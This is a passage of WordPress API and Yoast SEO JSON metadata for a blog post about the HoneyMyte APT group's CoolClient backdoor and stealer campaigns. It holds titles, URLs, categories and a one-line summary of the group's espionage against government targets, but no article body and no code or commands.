class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"headline\":\"HoneyMyte updates CoolClient and deploys multiple stealers in recent campaigns\",\"datePublished\":\"2026-01-27T09:00:36+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/\"},\"wordCount\":3432,\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26190932\/SL-HoneyMyte-CoolClient-featured-990x400.jpg\",\"keywords\":[\"Cybersecurity\"],\"articleSection\":[\"APT\",\"APT (Targeted attacks)\",\"APT reports\",\"Backdoor\",\"Browser\",\"Cybersecurity\",\"Firefox\",\"Google Chrome\",\"GReAT research\",\"HoneyMyte\",\"Infostealers\",\"Malware\",\"Malware descriptions\",\"Malware Technologies\",\"Microsoft Edge\",\"Targeted attacks\",\"Trojan-stealer\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/\",\"url\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/\",\"name\":\"HoneyMyte updates CoolClient and deploys multiple stealers in recent campaigns - Imperative Business Ventures Limited\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26190932\/SL-HoneyMyte-CoolClient-featured-990x400.jpg\",\"datePublished\":\"2026-01-27T09:00:36+00:00\",\"author\":{\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"breadcrumb\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/#primaryimage\",\"url\":\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26190932\/SL-HoneyMyte-CoolClient-featured-990x400.jpg\",\"contentUrl\":\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26190932\/SL-HoneyMyte-CoolClient-featured-990x400.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/blog.ibvl.in\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"HoneyMyte updates CoolClient and deploys multiple stealers in recent campaigns\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/blog.ibvl.in\/#website\",\"url\":\"https:\/\/blog.ibvl.in\/\",\"name\":\"Imperative Business Ventures Limited\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/blog.ibvl.in\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\/\/blog.ibvl.in\"],\"url\":\"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"HoneyMyte updates CoolClient and deploys multiple stealers in recent campaigns - Imperative Business Ventures Limited","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/","og_locale":"en_US","og_type":"article","og_title":"HoneyMyte updates CoolClient and deploys multiple stealers in recent campaigns - Imperative Business Ventures Limited","og_description":"Over the past few years, we\u2019ve been observing and monitoring the espionage activities of HoneyMyte (aka Mustang Panda or Bronze President) within Asia and Europe, with the Southeast Asia region being the most affected. The primary targets of most of the group\u2019s campaigns were government entities. As an APT group, HoneyMyte uses a variety of [&hellip;]","og_url":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/","og_site_name":"Imperative Business Ventures Limited","article_published_time":"2026-01-27T09:00:36+00:00","og_image":[{"url":"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26190932\/SL-HoneyMyte-CoolClient-featured-990x400.jpg","type":"","width":"","height":""}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"18 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/#article","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/"},"author":{"name":"admin","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"headline":"HoneyMyte updates CoolClient and deploys multiple stealers in recent campaigns","datePublished":"2026-01-27T09:00:36+00:00","mainEntityOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/"},"wordCount":3432,"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/#primaryimage"},"thumbnailUrl":"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26190932\/SL-HoneyMyte-CoolClient-featured-990x400.jpg","keywords":["Cybersecurity"],"articleSection":["APT","APT (Targeted attacks)","APT reports","Backdoor","Browser","Cybersecurity","Firefox","Google Chrome","GReAT research","HoneyMyte","Infostealers","Malware","Malware descriptions","Malware Technologies","Microsoft Edge","Targeted attacks","Trojan-stealer"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/","url":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/","name":"HoneyMyte updates CoolClient and deploys multiple stealers in recent campaigns - Imperative Business Ventures Limited","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/#website"},"primaryImageOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/#primaryimage"},"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/#primaryimage"},"thumbnailUrl":"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26190932\/SL-HoneyMyte-CoolClient-featured-990x400.jpg","datePublished":"2026-01-27T09:00:36+00:00","author":{"@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"breadcrumb":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/#primaryimage","url":"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26190932\/SL-HoneyMyte-CoolClient-featured-990x400.jpg","contentUrl":"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26190932\/SL-HoneyMyte-CoolClient-featured-990x400.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/blog.ibvl.in\/"},{"@type":"ListItem","position":2,"name":"HoneyMyte updates CoolClient and deploys multiple stealers in recent campaigns"}]},{"@type":"WebSite","@id":"https:\/\/blog.ibvl.in\/#website","url":"https:\/\/blog.ibvl.in\/","name":"Imperative Business Ventures Limited","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/blog.ibvl.in\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/blog.ibvl.in"],"url":"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/"}]}},"_links":{"self":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/836","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/comments?post=836"}],"version-history":[{"count":0,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/836\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/media?parent=836"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/categories?post=836"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/tags?post=836"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}